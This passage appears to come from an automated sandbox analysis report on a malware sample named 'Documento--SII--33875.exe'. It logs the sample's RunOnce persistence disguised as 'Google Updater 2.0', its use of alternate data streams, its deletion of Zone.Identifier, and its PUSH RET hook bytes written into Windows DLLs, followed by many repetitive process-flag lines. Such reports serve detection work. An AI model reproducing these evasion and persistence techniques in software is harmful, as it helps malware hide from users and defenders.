                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0Jump to behavior
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0Jump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Creates files in alternative data streams (ADS)
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe:14EDFC78Jump to behavior
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeFile opened: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe:Zone.Identifier read attributes | delete
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeFile opened: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe:Zone.Identifier read attributes | delete
                      Overwrites Windows DLL code with PUSH RET codes
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: PID: 2244 base: 77A077F0 value: 68 F3 81 78 04 C3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: PID: 240 base: 77A077F0 value: 68 F3 81 CA 03 C3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: PID: 4644 base: 77A077F0 value: 68 F3 81 30 04 C3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: PID: 3060 base: 77A077F0 value: 68 F3 81 C4 03 C3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: PID: 4668 base: 77A077F0 value: 68 F3 81 C0 03 C3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: PID: 4612 base: 77A077F0 value: 68 F3 81 87 03 C3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: PID: 2588 base: 77A077F0 value: 68 F3 81 F0 03 C3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: PID: 1688 base: 77A077F0 value: 68 F3 81 00 04 C3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: PID: 2248 base: 77A077F0 value: 68 F3 81 D0 03 C3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: PID: 2188 base: 77A077F0 value: 68 F3 81 19 04 C3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: PID: 3332 base: 77A077F0 value: 68 F3 81 5A 04 C3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: PID: 2036 base: 77A077F0 value: 68 F3 81 13 04 C3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: PID: 7416 base: 77A077F0 value: 68 F3 81 B6 05 C3
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
